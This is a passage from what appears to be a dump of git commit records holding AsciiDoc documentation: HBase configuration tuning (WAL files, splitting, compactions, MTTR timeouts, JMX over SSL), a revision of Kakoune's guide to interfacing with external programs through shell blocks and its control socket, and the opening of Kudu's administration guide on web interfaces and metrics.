reasonable, conservative configuration that will work on nearly all machine types that people might want to test with.\nIf you have larger machines -- HBase has 8G and larger heap -- you might find the following configuration options helpful.\nTODO.\n\n[[config.compression]]\n==== Compression\n\nYou should consider enabling ColumnFamily compression.\nThere are several options that are near-frictionless and in most all cases boost performance by reducing the size of StoreFiles and thus reducing I\/O.\n\nSee <<compression,compression>> for more information.\n\n[[config.wals]]\n==== Configuring the size and number of WAL files\n\nHBase uses <<wal,wal>> to recover the memstore data that has not been flushed to disk in case of an RS failure.\nThese WAL files should be configured to be slightly smaller than HDFS block (by default a HDFS block is 64Mb and a WAL file is ~60Mb).\n\nHBase also has a limit on the number of WAL files, designed to ensure there's never too much data that needs to be replayed during recovery.\nThis limit needs to be set according to memstore configuration, so that all the necessary data would fit.\nIt is recommended to allocate enough WAL files to store at least that much data (when all memstores are close to full). For example, with 16Gb RS heap, default memstore settings (0.4), and default WAL file size (~60Mb), 16Gb*0.4\/60, the starting point for WAL file count is ~109.\nHowever, as all memstores are not expected to be full all the time, less WAL files can be allocated.\n\n[[disable.splitting]]\n==== Managed Splitting\n\nHBase generally handles splitting of your regions based upon the settings in your _hbase-default.xml_ and _hbase-site.xml_ configuration files.\nImportant settings include `hbase.regionserver.region.split.policy`, `hbase.hregion.max.filesize`, `hbase.regionserver.regionSplitLimit`.\nA simplistic view of splitting is that when a region grows to `hbase.hregion.max.filesize`, it is split.\nFor most usage patterns, you should use automatic splitting.\nSee <<manual_region_splitting_decisions,manual region splitting decisions>> for more information about manual region splitting.\n\nInstead of allowing HBase to split your regions automatically, you can choose to manage the splitting yourself.\nThis feature was added in HBase 0.90.0.\nManually managing splits works if you know your keyspace well, otherwise let HBase figure where to split for you.\nManual splitting can mitigate region creation and movement under load.\nIt also makes it so region boundaries are known and invariant (if you disable region splitting). If you use manual splits, it is easier doing staggered, time-based major compactions to spread out your network IO load.\n\n.Disable Automatic Splitting\nTo disable automatic splitting, you can set region split policy in either cluster configuration or table configuration to be `org.apache.hadoop.hbase.regionserver.DisabledRegionSplitPolicy`\n\n.Automatic Splitting Is Recommended\n[NOTE]\n====\nIf you disable automatic splits to diagnose a problem or during a period of fast data growth, it is recommended to re-enable them when your situation becomes more stable.\nThe potential benefits of managing region splits yourself are not undisputed.\n====\n\n.Determine the Optimal Number of Pre-Split Regions\nThe optimal number of pre-split regions depends on your application and environment.\nA good rule of thumb is to start with 10 pre-split regions per server and watch as data grows over time.\nIt is better to err on the side of too few regions and perform rolling splits later.\nThe optimal number of regions depends upon the largest StoreFile in your region.\nThe size of the largest StoreFile will increase with time if the amount of data grows.\nThe goal is for the largest region to be just large enough that the compaction selection algorithm only compacts it during a timed major compaction.\nOtherwise, the cluster can be prone to compaction storms with a large number of regions under compaction at the same time.\nIt is important to understand that the data growth causes compaction storms and not the manual split decision.\n\nIf the regions are split into too many large regions, you can increase the major compaction interval by configuring `HConstants.MAJOR_COMPACTION_PERIOD`.\nHBase 0.90 introduced `org.apache.hadoop.hbase.util.RegionSplitter`, which provides a network-IO-safe rolling split of all regions.\n\n[[managed.compactions]]\n==== Managed Compactions\n\nBy default, major compactions are scheduled to run once in a 7-day period.\nPrior to HBase 0.96.x, major compactions were scheduled to happen once per day by default.\n\nIf you need to control exactly when and how often major compaction runs, you can disable managed major compactions.\nSee the entry for `hbase.hregion.majorcompaction` in the <<compaction.parameters,compaction.parameters>> table for details.\n\n.Do Not Disable Major Compactions\n[WARNING]\n====\nMajor compactions are absolutely necessary for StoreFile clean-up.\nDo not disable them altogether.\nYou can run major compactions manually via the HBase shell or via the link:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/client\/Admin.html#majorCompact-org.apache.hadoop.hbase.TableName-[Admin API].\n====\n\nFor more information about compactions and the compaction file selection process, see <<compaction,compaction>>\n\n[[spec.ex]]\n==== Speculative Execution\n\nSpeculative Execution of MapReduce tasks is on by default, and for HBase clusters it is generally advised to turn off Speculative Execution at a system-level unless you need it for a specific case, where it can be configured per-job.\nSet the properties `mapreduce.map.speculative` and `mapreduce.reduce.speculative` to false.\n\n[[other_configuration]]\n=== Other Configurations\n\n[[balancer_config]]\n==== Balancer\n\nThe balancer is a periodic operation which is run on the master to redistribute regions on the cluster.\nIt is configured via `hbase.balancer.period` and defaults to 300000 (5 minutes).\n\nSee <<master.processes.loadbalancer,master.processes.loadbalancer>> for more information on the LoadBalancer.\n\n[[disabling.blockcache]]\n==== Disabling Blockcache\n\nDo not turn off block cache (You'd do it by setting `hfile.block.cache.size` to zero). Currently we do not do well if you do this because the RegionServer will spend all its time loading HFile indices over and over again.\nIf your working set is such that block cache does you no good, at least size the block cache such that HFile indices will stay up in the cache (you can get a rough idea on the size you need by surveying RegionServer UIs; you'll see index block size accounted near the top of the webpage).\n\n[[nagles]]\n==== link:http:\/\/en.wikipedia.org\/wiki\/Nagle's_algorithm[Nagle's] or the small package problem\n\nIf a big 40ms or so occasional delay is seen in operations against HBase, try the Nagles' setting.\nFor example, see the user mailing list thread, link:http:\/\/search-hadoop.com\/m\/pduLg2fydtE\/Inconsistent+scan+performance+with+caching+set+&subj=Re+Inconsistent+scan+performance+with+caching+set+to+1[Inconsistent scan performance with caching set to 1] and the issue cited therein where setting `notcpdelay` improved scan speeds.\nYou might also see the graphs on the tail of link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-7008[HBASE-7008 Set scanner caching to a better default] where our Lars Hofhansl tries various data sizes w\/ Nagle's on and off measuring the effect.\n\n[[mttr]]\n==== Better Mean Time to Recover (MTTR)\n\nThis section is about configurations that will make servers come back faster after a fail.\nSee the Deveraj Das and Nicolas Liochon blog post link:http:\/\/hortonworks.com\/blog\/introduction-to-hbase-mean-time-to-recover-mttr\/[Introduction to HBase Mean Time to Recover (MTTR)] for a brief introduction.\n\nThe issue link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-8389[HBASE-8354 forces Namenode into loop with lease recovery requests] is messy but has a bunch of good discussion toward the end on low timeouts and how to cause faster recovery including citation of fixes added to HDFS. Read the Varun Sharma comments.\nThe below suggested configurations are Varun's suggestions distilled and tested.\nMake sure you are running on a late-version HDFS so you have the fixes he refers to and himself adds to HDFS that help HBase MTTR (e.g.\nHDFS-3703, HDFS-3712, and HDFS-4791 -- Hadoop 2 for sure has them and late Hadoop 1 has some). Set the following in the RegionServer.\n\n[source,xml]\n----\n<property>\n <name>hbase.lease.recovery.dfs.timeout<\/name>\n <value>23000<\/value>\n <description>How much time we allow elapse between calls to recover lease.\n Should be larger than the dfs timeout.<\/description>\n<\/property>\n<property>\n <name>dfs.client.socket-timeout<\/name>\n <value>10000<\/value>\n <description>Down the DFS timeout from 60 to 10 seconds.<\/description>\n<\/property>\n----\n\nAnd on the NameNode\/DataNode side, set the following to enable 'staleness' introduced in HDFS-3703, HDFS-3912.\n\n[source,xml]\n----\n<property>\n <name>dfs.client.socket-timeout<\/name>\n <value>10000<\/value>\n <description>Down the DFS timeout from 60 to 10 seconds.<\/description>\n<\/property>\n<property>\n <name>dfs.datanode.socket.write.timeout<\/name>\n <value>10000<\/value>\n <description>Down the DFS timeout from 8 * 60 to 10 seconds.<\/description>\n<\/property>\n<property>\n <name>ipc.client.connect.timeout<\/name>\n <value>3000<\/value>\n <description>Down from 60 seconds to 3.<\/description>\n<\/property>\n<property>\n <name>ipc.client.connect.max.retries.on.timeouts<\/name>\n <value>2<\/value>\n <description>Down from 45 seconds to 3 (2 == 3 retries).<\/description>\n<\/property>\n<property>\n <name>dfs.namenode.avoid.read.stale.datanode<\/name>\n <value>true<\/value>\n <description>Enable stale state in hdfs<\/description>\n<\/property>\n<property>\n <name>dfs.namenode.stale.datanode.interval<\/name>\n <value>20000<\/value>\n <description>Down from default 30 seconds<\/description>\n<\/property>\n<property>\n <name>dfs.namenode.avoid.write.stale.datanode<\/name>\n <value>true<\/value>\n <description>Enable stale state in hdfs<\/description>\n<\/property>\n----\n\n[[jmx_config]]\n==== JMX\n\nJMX (Java Management Extensions) provides built-in instrumentation that enables you to monitor and manage the Java VM.\nTo enable monitoring and management from remote systems, you need to set system property `com.sun.management.jmxremote.port` (the port number through which you want to enable JMX RMI connections) when you start the Java VM.\nSee the link:http:\/\/docs.oracle.com\/javase\/8\/docs\/technotes\/guides\/management\/agent.html[official documentation] for more information.\nHistorically, besides above port mentioned, JMX opens two additional random TCP listening ports, which could lead to port conflict problem. (See link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-10289[HBASE-10289] for details)\n\nAs an alternative, You can use the coprocessor-based JMX implementation provided by HBase.\nTo enable it in 0.99 or above, add below property in _hbase-site.xml_:\n\n[source,xml]\n----\n<property>\n <name>hbase.coprocessor.regionserver.classes<\/name>\n <value>org.apache.hadoop.hbase.JMXListener<\/value>\n<\/property>\n----\n\nNOTE: DO NOT set `com.sun.management.jmxremote.port` for Java VM at the same time.\n\nCurrently it supports Master and RegionServer Java VM.\nBy default, the JMX listens on TCP port 10102, you can further configure the port using below properties:\n\n[source,xml]\n----\n<property>\n <name>regionserver.rmi.registry.port<\/name>\n <value>61130<\/value>\n<\/property>\n<property>\n <name>regionserver.rmi.connector.port<\/name>\n <value>61140<\/value>\n<\/property>\n----\n\nThe registry port can be shared with connector port in most cases, so you only need to configure regionserver.rmi.registry.port.\nHowever if you want to use SSL communication, the 2 ports must be configured to different values.\n\nBy default the password authentication and SSL communication is disabled.\nTo enable password authentication, you need to update _hbase-env.sh_ like below:\n[source,bash]\n----\nexport HBASE_JMX_BASE=\"-Dcom.sun.management.jmxremote.authenticate=true \\\n -Dcom.sun.management.jmxremote.password.file=your_password_file \\\n -Dcom.sun.management.jmxremote.access.file=your_access_file\"\n\nexport HBASE_MASTER_OPTS=\"$HBASE_MASTER_OPTS $HBASE_JMX_BASE \"\nexport HBASE_REGIONSERVER_OPTS=\"$HBASE_REGIONSERVER_OPTS $HBASE_JMX_BASE \"\n----\n\nSee example password\/access file under _$JRE_HOME\/lib\/management_.\n\nTo enable SSL communication with password authentication, follow below steps:\n\n[source,bash]\n----\n#1. generate a key pair, stored in myKeyStore\nkeytool -genkey -alias jconsole -keystore myKeyStore\n\n#2. export it to file jconsole.cert\nkeytool -export -alias jconsole -keystore myKeyStore -file jconsole.cert\n\n#3. copy jconsole.cert to jconsole client machine, import it to jconsoleKeyStore\nkeytool -import -alias jconsole -keystore jconsoleKeyStore -file jconsole.cert\n----\n\nAnd then update _hbase-env.sh_ like below:\n\n[source,bash]\n----\nexport HBASE_JMX_BASE=\"-Dcom.sun.management.jmxremote.ssl=true \\\n -Djavax.net.ssl.keyStore=\/home\/tianq\/myKeyStore \\\n -Djavax.net.ssl.keyStorePassword=your_password_in_step_1 \\\n -Dcom.sun.management.jmxremote.authenticate=true \\\n -Dcom.sun.management.jmxremote.password.file=your_password file \\\n -Dcom.sun.management.jmxremote.access.file=your_access_file\"\n\nexport HBASE_MASTER_OPTS=\"$HBASE_MASTER_OPTS $HBASE_JMX_BASE \"\nexport HBASE_REGIONSERVER_OPTS=\"$HBASE_REGIONSERVER_OPTS $HBASE_JMX_BASE \"\n----\n\nFinally start `jconsole` on the client using the key store:\n\n[source,bash]\n----\njconsole -J-Djavax.net.ssl.trustStore=\/home\/tianq\/jconsoleKeyStore\n----\n\nNOTE: To enable the HBase JMX implementation on Master, you also need to add below property in _hbase-site.xml_:\n\n[source,xml]\n----\n<property>\n <name>hbase.coprocessor.master.classes<\/name>\n <value>org.apache.hadoop.hbase.JMXListener<\/value>\n<\/property>\n----\n\nThe corresponding properties for port configuration are `master.rmi.registry.port` (by default 10101) and `master.rmi.connector.port` (by default the same as registry.port)\n\n[[dyn_config]]\n== Dynamic Configuration\n\nSince HBase 1.0.0, it is possible to change a subset of the configuration without requiring a server restart.\nIn the HBase shell, there are new operators, `update_config` and `update_all_config` that will prompt a server or all servers to reload configuration.\n\nOnly a subset of all configurations can currently be changed in the running server.\nHere are those configurations:\n\n.Configurations support dynamically change\n[cols=\"1\",options=\"header\"]\n|===\n| Key\n| hbase.ipc.server.fallback-to-simple-auth-allowed\n| hbase.cleaner.scan.dir.concurrent.size\n| hbase.regionserver.thread.compaction.large\n| hbase.regionserver.thread.compaction.small\n| hbase.regionserver.thread.split\n| hbase.regionserver.throughput.controller\n| hbase.regionserver.thread.hfilecleaner.throttle\n| hbase.regionserver.hfilecleaner.large.queue.size\n| hbase.regionserver.hfilecleaner.small.queue.size\n| hbase.regionserver.hfilecleaner.large.thread.count\n| hbase.regionserver.hfilecleaner.small.thread.count\n| hbase.regionserver.flush.throughput.controller\n| hbase.hstore.compaction.max.size\n| hbase.hstore.compaction.max.size.offpeak\n| hbase.hstore.compaction.min.size\n| hbase.hstore.compaction.min\n| hbase.hstore.compaction.max\n| hbase.hstore.compaction.ratio\n| hbase.hstore.compaction.ratio.offpeak\n| hbase.regionserver.thread.compaction.throttle\n| hbase.hregion.majorcompaction\n| hbase.hregion.majorcompaction.jitter\n| hbase.hstore.min.locality.to.skip.major.compact\n| hbase.hstore.compaction.date.tiered.max.storefile.age.millis\n| hbase.hstore.compaction.date.tiered.incoming.window.min\n| hbase.hstore.compaction.date.tiered.window.policy.class\n| hbase.hstore.compaction.date.tiered.single.output.for.minor.compaction\n| hbase.hstore.compaction.date.tiered.window.factory.class\n| hbase.offpeak.start.hour\n| hbase.offpeak.end.hour\n| hbase.oldwals.cleaner.thread.size\n| hbase.procedure.worker.keep.alive.time.msec\n| hbase.procedure.worker.add.stuck.percentage\n| hbase.procedure.worker.monitor.interval.msec\n| hbase.procedure.worker.stuck.threshold.msec\n| hbase.regions.slop\n| hbase.regions.overallSlop\n| hbase.balancer.tablesOnMaster\n| hbase.balancer.tablesOnMaster.systemTablesOnly\n| hbase.util.ip.to.rack.determiner\n| hbase.ipc.server.max.callqueue.length\n| hbase.ipc.server.priority.max.callqueue.length\n| hbase.ipc.server.callqueue.type\n| hbase.ipc.server.callqueue.codel.target.delay\n| hbase.ipc.server.callqueue.codel.interval\n| hbase.ipc.server.callqueue.codel.lifo.threshold\n| hbase.master.balancer.stochastic.maxSteps\n| hbase.master.balancer.stochastic.stepsPerRegion\n| hbase.master.balancer.stochastic.maxRunningTime\n| hbase.master.balancer.stochastic.runMaxSteps\n| hbase.master.balancer.stochastic.numRegionLoadsToRemember\n| hbase.master.loadbalance.bytable\n| hbase.master.balancer.stochastic.minCostNeedBalance\n| hbase.master.balancer.stochastic.localityCost\n| hbase.master.balancer.stochastic.rackLocalityCost\n| hbase.master.balancer.stochastic.readRequestCost\n| hbase.master.balancer.stochastic.writeRequestCost\n| hbase.master.balancer.stochastic.memstoreSizeCost\n| hbase.master.balancer.stochastic.storefileSizeCost\n| hbase.master.balancer.stochastic.regionReplicaHostCostKey\n| hbase.master.balancer.stochastic.regionReplicaRackCostKey\n| hbase.master.balancer.stochastic.regionCountCost\n| hbase.master.balancer.stochastic.primaryRegionCountCost\n| hbase.master.balancer.stochastic.moveCost\n| hbase.master.balancer.stochastic.maxMovePercent\n| hbase.master.balancer.stochastic.tableSkewCost\n|===\n\nifdef::backend-docbook[]\n[index]\n== Index\n\/\/ Generated automatically by the DocBook toolchain.\nendif::backend-docbook[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ecfb71514538a8bd9324beb559ce426bc2a22622","subject":"Update interfacing.asciidoc","message":"Update interfacing.asciidoc\n","repos":"jkonecny12\/kakoune,occivink\/kakoune,ekie\/kakoune,lenormf\/kakoune,occivink\/kakoune,lenormf\/kakoune,alpha123\/kakoune,xificurC\/kakoune,danr\/kakoune,Asenar\/kakoune,Somasis\/kakoune,ekie\/kakoune,zakgreant\/kakoune,zakgreant\/kakoune,alpha123\/kakoune,alpha123\/kakoune,rstacruz\/kakoune,jjthrash\/kakoune,rstacruz\/kakoune,danielma\/kakoune,xificurC\/kakoune,rstacruz\/kakoune,jjthrash\/kakoune,lenormf\/kakoune,Somasis\/kakoune,danielma\/kakoune,alexherbo2\/kakoune,flavius\/kakoune,Asenar\/kakoune,casimir\/kakoune,danielma\/kakoune,jjthrash\/kakoune,danr\/kakoune,casimir\/kakoune,mawww\/kakoune,zakgreant\/kakoune,mawww\/kakoune,ekie\/kakoune,Asenar\/kakoune,Somasis\/kakoune,Somasis\/kakoune,xificurC\/kakoune,alexherbo2\/kakoune,danielma\/kakoune,xificurC\/kakoune,danr\/kakoune,alexherbo2\/kakoune,occivink\/kakoune,zakgreant\/kakoune,flavius\/kakoune,casimir\/kakoune,alpha123\/kakoune,occivink\/kakoune,rstacruz\/kakoune,mawww\/kakoune,casimir\/kakoune,danr\/kakoune,jkonecny12\/kakoune,jkonecny12\/kakoune,ekie\/kakoune,elegios\/kakoune,lenormf\/kakoune,jjthrash\/kakoune,flavius\/kakoune,jkonecny12\/kakoune,Asenar\/kakoune,elegios\/kakoune,elegios\/kakoune,alexherbo2\/kakoune,elegios\/kakoune,mawww\/kakoune,flavius\/kakoune","old_file":"doc\/interfacing.asciidoc","new_file":"doc\/interfacing.asciidoc","new_contents":"Interfacing Kakoune with external programs\n==========================================\n\nIn order to interact with the external world, Kakoune uses the shell, mainly\nthrough the +%sh{ ... }+ string type, and it's control socket.\n\nBasic interaction\n-----------------\n\nFor synchronous operations, +%sh{ ... }+ blocks are easy to use, they behave\nsimilarly to +$( ... )+ shell construct.\n\nFor example, one can echo the current time in Kakoune status line using:\n\n[source,bash]\n----\n:echo %sh{ date }\n----\n\nFor asynchronous operations, the Kakoune Unix stream socket can be used. This\nis the same socket that Kakoune clients connect to. It is available through\n+kak_session+ environment variable: the socket is +\/tmp\/kak-${kak_session}+\n\nFor example, we can echo a message in Kakoune in 10 seconds with:\n\n[source,bash]\n----\n:nop %sh{ (\n sleep 10\n echo \"eval -client '$kak_client' 'echo sleep ended'\" |\n kak -p ${kak_session}\n) > \/dev\/null 2>&1 < \/dev\/null & }\n----\n\n * The +nop+ command is used so that any eventual output from the\n +%sh{ ... }+ is not interpreted by Kakoune\n * When writing to the socket, Kakoune has no way to guess in which\n client's context the command should be evaluated. A temporary\n context is used, which does not have any user interface, so if we want\n to interact with the user, we need to use the +eval+ command, with\n it's +-client+ option to send commands to a specific client.\n * For the command to run asynchronously, we wrap it in a sub shell\n with parenthesis, redirect it's +std{in,err,out}+ to +\/dev\/null+, and\n run it in background with +&+. Using this pattern, the shell does\n not wait for this sub shell to finish before quitting.\n\nInteractive output\n------------------\n\nIt is a frequent interaction mode to run a program and display it's output\nin a Kakoune buffer.\n\nThe common pattern to do that is to use a fifo buffer:\n\n[source,bash]\n-----\n%sh{\n # Create a temporary fifo for communication\n output=$(mktemp -d -t kak-temp-XXXXXXXX)\/fifo\n mkfifo ${output}\n # run command detached from the shell\n ( run command here > ${output} ) > \/dev\/null 2>&1 < \/dev\/null &\n # Open the file in Kakoune and add a hook to remove the fifo\n echo \"edit! -fifo %{output} *buffer-name*\n hook buffer BufClose .* %{ nop %sh{ rm -r $(dirname ${output}} }\"\n}\n-----\n\nThis is a very simple example, most of the time, the echo command will as\nwell contains\n\n-----\nset buffer filetype <...>\n-----\n\nand some hooks for this filetype will have been written\n\nCompletion candidates\n---------------------\n\nMost of the time, filetype specific completion should be provided by\nexternal programs.\n\nexternal completions are provided using an option to store completion, which\nhave the following format.\n\n----\nline.column[+len]@timestamp:candidate1[@desc1]:candidate2[@desc2]:...\n----\n\nthe first element of this string list specify where and when this completions\napplies, the others are simply completion candidates, eventually containing\na descriptive text (after an `@` separator).\n\nto effectively use that completion option, it should get added to the completers\noption.\n\n---\nset -add buffer completers option=my_option_name\n---\n\nAs a completion program may take some time to compute the candidates, it should\nrun asynchronously. In order to do that, the following pattern may be used:\n\n[source,bash]\n-----\n# Declare the option which will store the temporary filename\ndecl str plugin_filename\n# Declare the completion option\ndecl str plugin_completions\n# Add plugin_completions to completers for files of good filetype\nhook global BufSetOption filetype=my_filetype %{\n set -add buff completers option=plugin_completions\n}\n%sh{\n # ask Kakoune to write current buffer to temporary file\n filename=$(mktemp -t kak-temp.XXXXXXXX)\n echo \"set buffer plugin_filename '$filename'\n write '$filename'\"\n}\n# End the %sh{} so that it's output gets executed by Kakoune.\n# Use a nop so that any eventual output of this %sh does not get interpreted.\nnop %sh{ ( # launch a detached shell\n buffer=\"${kak_opt_plugin_filename}\"\n line=\"${kak_cursor_line}\"\n column=\"${kak_cursor_column}\"\n # run completer program and put output in colon separated format\n candidates=$(completer $buffer $line $column | completer_filter)\n # remove temporary file\n rm $buffer\n # generate completion option value\n completions=\"$line.$column@$kak_timestamp:$candidates\"\n # write to Kakoune socket for the buffer that triggered the completion\n echo \"set buffer=${kak_bufname} plugin_completions '$completions'\" |\n kak -p ${kak_session}\n) > \/dev\/null 2>&1 < \/dev\/null & }\n-----\n","old_contents":"Interfacing Kakoune with external programs\n==========================================\n\nIn order to interact with the external world, Kakoune uses the shell, mainly\nthrough the +%sh{ ... }+ string type, and it's control socket.\n\nBasic interaction\n-----------------\n\nFor synchronous operations, +%sh{ ... }+ blocks are easy to use, they behave\nsimilarly to +$( ... )+ shell construct.\n\nFor example, one can echo the current time in Kakoune status line using:\n\n[source,bash]\n----\n:echo %sh{ date }\n----\n\nFor asynchronous operations, the Kakoune Unix stream socket can be used. This\nis the same socket that Kakoune clients connect to. It is available through\n+kak_session+ environment variable: the socket is +\/tmp\/kak-${kak_session}+\n\nFor example, we can echo a message in Kakoune in 10 seconds with:\n\n[source,bash]\n----\n:nop %sh{ (\n sleep 10\n echo \"eval -client '$kak_client' 'echo sleep ended'\" |\n kak -p ${kak_session}\n) > \/dev\/null 2>&1 < \/dev\/null & }\n----\n\n * The +nop+ command is used so that any eventual output from the\n +%sh{ ... }+ is not interpreted by Kakoune\n * When writing to the socket, Kakoune has no way to guess in which\n client's context the command should be evaluated. A temporary\n context is used, which does not have any user interface, so if we want\n to interact with the user, we need to use the +eval+ command, with\n it's +-client+ option to send commands to a specific client.\n * For the command to run asynchronously, we wrap it in a sub shell\n with parenthesis, redirect it's +std{in,err,out}+ to +\/dev\/null+, and\n run it in background with +&+. Using this pattern, the shell does\n not wait for this sub shell to finish before quitting.\n\nInteractive output\n------------------\n\nIt is a frequent interaction mode to run a program and display it's output\nin a Kakoune buffer.\n\nThe common pattern to do that is to use a fifo buffer:\n\n[source,bash]\n-----\n%sh{\n # Create a temporary fifo for communication\n output=$(mktemp -d -t kak-temp-XXXXXXXX)\/fifo\n mkfifo ${output}\n # run command detached from the shell\n ( run command here > ${output} ) > \/dev\/null 2>&1 < \/dev\/null &\n # Open the file in Kakoune and add a hook to remove the fifo\n echo \"edit! -fifo %{output} *buffer-name*\n hook buffer BufClose .* %{ nop %sh{ rm -r $(dirname ${output}} }\"\n}\n-----\n\nThis is a very simple example, most of the time, the echo command will as\nwell contains\n\n-----\nset buffer filetype <...>\n-----\n\nand some hooks for this filetype will have been written\n\nCompletion candidates\n---------------------\n\nMost of the time, filetype specific completion should be provided by\nexternal programs.\n\nexternal completions are provided using the +completions+ option, which\nhave the following format.\n\n----\nline.column[+len]@timestamp:candidate1:candidate2:...\n----\n\nthe first element of this string list specify where and when this completions\napplies, the others are simply completion candidates.\n\nAs a completion program may take some time to compute the candidates, it should\nrun asynchronously. In order to do that, the following pattern may be used:\n\n[source,bash]\n-----\n# Declare the option which will store the temporary filename\ndecl str plugin_filename\n%sh{\n # ask Kakoune to write current buffer to temporary file\n filename=$(mktemp -t kak-temp.XXXXXXXX)\n echo \"set buffer plugin_filename '$filename'\n write '$filename'\"\n}\n# End the %sh{} so that it's output gets executed by Kakoune.\n# Use a nop so that any eventual output of this %sh does not get interpreted.\nnop %sh{ ( # launch a detached shell\n buffer=\"${kak_opt_plugin_filename}\"\n line=\"${kak_cursor_line}\"\n column=\"${kak_cursor_column}\"\n # run completer program and put output in colon separated format\n candidates=$(completer $buffer $line $column | completer_filter)\n # remove temporary file\n rm $buffer\n # generate completion option value\n completions=\"$line.$column@$kak_timestamp:$candidates\"\n # write to Kakoune socket for the buffer that triggered the completion\n echo \"set buffer=${kak_bufname} completions '$completions'\" |\n kak -p ${kak_session}\n) > \/dev\/null 2>&1 < \/dev\/null & }\n-----\n","returncode":0,"stderr":"","license":"unlicense","lang":"AsciiDoc"} {"commit":"7679f9b7ef70982885c8141aa8136d4a2a237305","subject":"docs: add notes for multi master migration","message":"docs: add notes for multi master migration\n\nChange-Id: I7e469bc23b650f3b99c785311acc665ac20f33ea\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/5728\nTested-by: Kudu Jenkins\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\n","repos":"cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"\/\/ Licensed to the Apache Software Foundation (ASF) under one\n\/\/ or more contributor license agreements. See the NOTICE file\n\/\/ distributed with this work for additional information\n\/\/ regarding copyright ownership. The ASF licenses this file\n\/\/ to you under the Apache License, Version 2.0 (the\n\/\/ \"License\"); you may not use this file except in compliance\n\/\/ with the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing,\n\/\/ software distributed under the License is distributed on an\n\/\/ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n\/\/ KIND, either express or implied. See the License for the\n\/\/ specific language governing permissions and limitations\n\/\/ under the License.\n\n[[administration]]\n= Apache Kudu Administration\n\n:author: Kudu Team\n:imagesdir: .\/images\n:icons: font\n:toc: left\n:toclevels: 3\n:doctype: book\n:backend: html5\n:sectlinks:\n:experimental:\n\nNOTE: Kudu is easier to manage with link:http:\/\/www.cloudera.com\/content\/www\/en-us\/products\/cloudera-manager.html[Cloudera Manager]\nthan in a standalone installation. See Cloudera's\nlink:http:\/\/www.cloudera.com\/content\/www\/en-us\/documentation\/betas\/kudu\/latest\/topics\/kudu_installation.html[Kudu documentation]\nfor more details about using Kudu with Cloudera Manager.\n\n== Starting and Stopping Kudu Processes\n\nNOTE: These instructions are relevant only when Kudu is installed using operating system packages\n(e.g. `rpm` or `deb`).\n\ninclude::installation.adoc[tags=start_stop]\n\n== Kudu Web Interfaces\n\nKudu tablet servers and masters expose useful operational information on a built-in web interface,\n\n=== Kudu Master Web Interface\n\nKudu master processes serve their web interface on port 8051. The interface exposes several pages\nwith information about the cluster state:\n\n- A list of tablet servers, their host names, and the time of their last heartbeat.\n- A list of tables, including schema and tablet location information for each.\n- SQL code which you can paste into Impala Shell to add an existing table to Impala's list of known data sources.\n\n=== Kudu Tablet Server Web Interface\n\nEach tablet server serves a web interface on port 8050. The interface exposes information\nabout each tablet hosted on the server, its current state, and debugging information\nabout maintenance background operations.\n\n=== Common Web Interface Pages\n\nBoth Kudu masters and tablet servers expose a common set of information via their web interfaces:\n\n- HTTP access to server logs.\n- an `\/rpcz` endpoint which lists currently running RPCs via JSON.\n- pages giving an overview and detailed information on the memory usage of different\n components of the process.\n- information on the current set of configuration flags.\n- information on the currently running threads and their resource consumption.\n- a JSON endpoint exposing metrics about the server.\n- information on the deployed version number of the daemon.\n\nThese interfaces are linked from the landing page of each daemon's web UI.\n\n== Kudu Metrics\n\nKudu daemons expose a large number of metrics. Some metrics are associated with an entire\nserver process, whereas others are associated with a particular tablet replica.\n\n=== Listing available metrics\n\nThe full set of available metrics for a Kudu server can be dumped via a special command\nline flag:\n\n[source,bash]\n----\n$ kudu-tserver --dump_metrics_json\n$ kudu-master --dump_metrics_json\n----\n\nThis will output a large JSON document. Each metric indicates its name, label, description,\nunits, and type. Because the output is JSON-formatted, this information can easily be\nparsed and fed into other tooling which collects metrics from Kudu servers.\n\n=== Collecting metrics via HTTP\n\nMetrics can be collected from a server process via its HTTP interface by visiting\n`\/metrics`. The output of this page is JSON for easy parsing by monitoring services.\nThis endpoint accepts several `GET` parameters in its query string:\n\n- `\/metrics?metrics=<substring1>,<substring2>,...` - limits the returned metrics to those which contain\nat least one of the provided substrings. The substrings also match entity names, so this\nmay be used to collect metrics for a specific tablet.\n\n- `\/metrics?include_schema=1` - includes metrics schema information such as unit, description,\nand label in the JSON output. This information is typically elided to save space.\n\n- `\/metrics?compact=1` - eliminates unnecessary whitespace from the resulting JSON, which can decrease\nbandwidth when fetching this page from a remote host.\n\n- `\/metrics?include_raw_histograms=1` - include the raw buckets and values for histogram metrics,\nenabling accurate aggregation of percentile metrics over time and across hosts.\n\nFor example:\n\n[source,bash]\n----\n$ curl -s 'http:\/\/example-ts:8050\/metrics?include_schema=1&metrics=connections_accepted'\n----\n\n[source,json]\n----\n[\n {\n \"type\": \"server\",\n \"id\": \"kudu.tabletserver\",\n \"attributes\": {},\n \"metrics\": [\n {\n \"name\": 